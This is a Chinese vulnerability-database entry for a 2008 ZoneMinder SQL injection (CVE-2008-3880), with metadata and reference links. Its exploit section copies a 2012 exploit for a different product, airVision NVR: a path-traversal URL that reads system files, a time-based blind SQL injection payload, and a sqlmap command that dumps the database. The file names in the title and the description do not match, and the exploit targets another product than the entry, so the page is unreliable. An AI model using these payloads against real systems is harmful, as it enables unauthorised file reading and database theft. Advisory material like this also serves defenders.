Zoneminder 'zm_html_view.php'SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1185534 漏洞类型 SQL注入
发布时间 2008-09-02 更新时间 2008-09-17
CVE编号 CVE-2008-3880 CNNVD-ID CNNVD-200809-010
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2012100132
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200809-010
|漏洞详情
ZoneMinder是一款针对摄像机的安全监督软件。ZoneMinder1.23.3以及之前的版本中的zm_html_view_event.php存在SQL注入漏洞。远程攻击者可以借助过滤器数组参数,执行任意的SQL指令。
|漏洞EXP
Exploit Title: airVisionNVR readfile() disclosure and sql injection
Google Dork:
Date: Oct 13, 2012
Exploit Author: pennyGrit
Vendor Homepage: http://www.ubnt.com/
Software Link: http://www.ubnt.com/downloads/airvision/airVision-v1.1.3-installer.exe
Version: 1.1.13
Tested on: WinXP SP3
CVE: Possibly related to CVE-2008-1381 and/or CVE-2008-3880
 
Overview: The airvision NVR program is an xampp-like suite that allows a regular PC to be used as a security NVR for the Ubiquity line of IP cameras. Several programs are installed including apache, PHP, mysql and a modified version of zoneminder. Ubiquity publishes install packages for both Windows and Ubuntu however only the Windows version was tested below.
 
* php readfile() local file discolsure: Unauthenticated users can review the contents of anyfile on the host machine using a browser:
http://192.168.56.101:7079/index.php?view=file&path=../../../../../../boot.ini
 
* sql AND/OR time-based blind injection: The 'id' parameter in ajax/event.php is vulnerable to a time based sql injection. Complete enumeration of the mysql 'nvr' database is possible.
Payload: request=event&action=video&eids=1&videoFormat=1&rate=1&scale=1&id=1 AND 3044=BENCHMARK(5000000,MD5(0x67714e77))
using sqlmap: python sqlmap.py --dbms=mysql -u "http://192.168.56.101:7079/index.php?request=event&action=video&eids=1&videoFormat=1&rate=1&scale=1&id=1" -p id --level 3 --risk 3 --technique T --dump

|参考资料

来源:XF
名称:zoneminder-zmhtmlviewevent-sql-injection(44726)
链接:http://xforce.iss.net/xforce/xfdb/44726
来源:BID
名称:30843
链接:http://www.securityfocus.com/bid/30843
来源:BUGTRAQ
名称:20080826ZoneMinderMultipleVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/495745/100/0/threaded
来源:SECUNIA
名称:31636
链接:http://secunia.com/advisories/31636